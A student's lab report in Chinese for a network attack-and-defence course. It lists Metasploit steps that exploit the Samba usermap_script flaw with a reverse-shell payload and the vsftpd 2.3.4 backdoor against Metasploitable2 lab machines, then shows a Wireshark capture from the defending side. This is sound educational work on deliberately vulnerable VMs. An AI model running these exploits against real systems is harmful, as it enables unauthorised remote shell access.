20231913 2023-2024-2 《网络攻防实践》实践七报告
1.实践过程
1.1 使用Metasploit进行Linux远程渗透攻击
输入msfconsole启动msfconsole
输入search usermap_script
输入use exploit/multi/samba/usermap_script
然后输入show payloads显示此漏洞的载荷
输入set payload cmd/unix/reverse
输入 set LHOST 192.168.236.251 (kali) 和 set RHOST 192.168.236.241(Metasploitable2_Linux)
渗透成功
1.2 实践作业:攻防对抗实践
(1)进攻
我的kali作为攻击机 ip192.168.236.251(20231913ZC)
YZY的metasploitable2-linux作为靶机 ip192.168.236.1(20231914TYZY)
ip地址如下
可以ping通
输入命令msfconsole启动,并输入search vsftp查找vsftp漏洞
输入
use exploit/unix/ftp/vsftpd_234_backdoor
show payloads
set payloads payload/cmd/unix/interact
set RHOST 192.168.236.1
set LHOST 192.168.1236.251
输入exploit,发现成功渗透,获得防守方靶机控制权
(2)防守
我作为防守方 防守机metasploitable2-linux ip192.168.236.241(20231913ZC)
攻击机kali ip192.168.236.20(20231914YZY)
可以ping通
靶机ip地址如下
YZY同学重复之前的步骤渗透我的靶机,我在wireshark中抓到了该数据包如下
2.学习中遇到的问题及解决
- 问题1:我在防守的时候一直ping不通
- 问题1解决方案:原来是插着网线,没有和YZY的电脑连接在一个网段下
3.实践总结
本次实践的内容不多,和上一次实践过程比较相似,我下载了一个新的虚拟机metasploitable2-linux,了解了Linux的远程渗透攻击。